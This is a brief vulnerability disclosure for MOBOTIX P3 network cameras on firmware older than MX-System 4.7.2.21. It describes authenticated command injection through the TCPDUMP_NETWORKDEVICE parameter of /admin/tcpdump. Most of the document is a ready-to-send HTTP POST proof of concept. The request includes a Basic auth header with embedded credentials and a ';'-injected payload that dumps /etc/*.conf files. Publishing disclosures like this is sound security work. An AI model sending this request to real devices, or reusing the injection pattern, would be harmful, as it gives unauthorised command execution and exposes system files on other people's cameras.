#Summary This vulnerability exists in versions of MOBOTIX P3 Cameras x14/x24/x15/x25, T24M/T25M prior to MX-System 4.7.2.21 firmware. Due to the lack of input validation in the request sent to "/admin/tcpdump", this vulnerability leads to authenticated remote code execution. #Exploitation In the affected module, tcpdump integration through the network interface has been observed via the web portal. The input in the "TCPDUMP_NETWORKDEVICE" parameter allows bypassing input validation by using the ";" character, enabling the execution of system commands. # Proof of concept POST /admin/tcpdump HTTP/1.1 Host: 127.0.0.1:5003 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 153 Upgrade-Insecure-Requests: 1 Authorization: Basic YWRtaW46bWVpbnNt Connection: close TCPDUMP_NETWORKDEVICE=%3bcat+/etc/*.conf&TCPDUMP_PROTOCOL=all&TCPDUMP_CAPTURETIMEOUT=1&TCPDUMP_IGNORE_IP=127.0.0.1&START_CAPTURE=Ba%C5%9Flat%2FDurdur